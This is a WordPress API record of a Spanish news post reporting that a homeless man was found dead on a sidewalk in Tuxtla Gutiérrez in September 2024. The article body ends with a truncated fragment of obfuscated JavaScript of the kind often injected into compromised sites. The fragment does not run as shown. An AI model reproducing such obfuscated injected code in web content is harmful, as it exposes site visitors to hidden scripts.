{"id":17849,"date":"2024-09-13T03:49:05","date_gmt":"2024-09-13T03:49:05","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=17849"},"modified":"2024-09-13T03:49:06","modified_gmt":"2024-09-13T03:49:06","slug":"hombre-pierde-la-vida-en-la-via-publica","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=17849","title":{"rendered":"Hombre pierde la vida en la v\u00eda p\u00fablica"},"content":{"rendered":"\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped wp-block-gallery-1 is-layout-flex wp-block-gallery-is-layout-flex\">\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"768\" data-id=\"17850\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/09\/FB_IMG_1726199268772-1024x768.jpg\" alt=\"\" class=\"wp-image-17850\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/09\/FB_IMG_1726199268772-1024x768.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/09\/FB_IMG_1726199268772-300x225.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/09\/FB_IMG_1726199268772-768x576.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/09\/FB_IMG_1726199268772.jpg 1080w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"768\" data-id=\"17851\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/09\/FB_IMG_1726199265258-1024x768.jpg\" alt=\"\" class=\"wp-image-17851\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/09\/FB_IMG_1726199265258-1024x768.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/09\/FB_IMG_1726199265258-300x225.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/09\/FB_IMG_1726199265258-768x576.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/09\/FB_IMG_1726199265258.jpg 1080w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n<\/figure>\n\n\n\n<p>Jairo Camacho.<\/p>\n\n\n\n<p>Agencia ReporteCiudano, 12 de septiembre del 2024. Tuxtla Guti\u00e9rrez. &#8211; Este jueves por la ma\u00f1ana fue localizado sin vida un hombre en la Avenida Colima y Calle Chiapas de la Colonia Las Granjas.<\/p>\n\n\n\n<p>Los vecinos informaron a las autoridades que, el hombre estaba tirado sobre la banqueta cerca de un \u00e1rbol y al intentar despertarlo no respond\u00eda.<\/p>\n\n\n\n<p>Al lugar arribaron param\u00e9dicos de la Cruz Roja Mexicana y despu\u00e9s de una revisi\u00f3n confirmaron el deceso del sujeto de unos 56 a\u00f1os de edad.<\/p>\n\n\n\n<p>En el lugar los vecinos relataron que, el hombre era enfermo alcoh\u00f3lico y viv\u00eda en situaci\u00f3n de calle.<\/p>\n\n\n\n<p>Peritos de la Fiscal\u00eda General del Estado, realizaron las diligencias correspondientes, levantaron el cuerpo y lo trasladaron al Semefo donde se practicar\u00eda la necropsia de ley, y en espera de que sea reclamado por sus familiares.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Jairo Camacho. Agencia ReporteCiudano, 12 de septiembre del 2024. Tuxtla Guti\u00e9rrez. &#8211; Este jueves por la ma\u00f1ana fue localizado sin vida un hombre en la Avenida Colima y Calle Chiapas de la Colonia Las Granjas. Los vecinos informaron a las autoridades que, el hombre estaba tirado sobre la banqueta cerca de un \u00e1rbol y al &hellip;<\/p>\n","protected":false},"author":2,"featured_media":17851,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[],"class_list":["post-17849","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-roja"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/17849","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=17849"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/17849\/revisions"}],"predecessor-version":[{"id":17852,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/17849\/revisions\/17852"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/17851"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=17849"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=17849"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=17849"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}